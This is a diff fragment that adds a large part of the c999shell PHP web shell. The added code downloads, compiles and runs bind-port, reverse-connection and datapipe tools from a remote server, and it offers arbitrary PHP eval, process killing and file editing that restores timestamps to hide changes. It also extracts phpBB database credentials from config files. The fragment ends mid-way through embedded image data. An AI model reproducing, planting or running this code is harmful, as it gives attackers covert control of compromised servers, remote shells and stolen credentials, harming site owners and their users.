+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c999sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c999sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c999sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c999sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c999sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c999sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c999shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c999shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
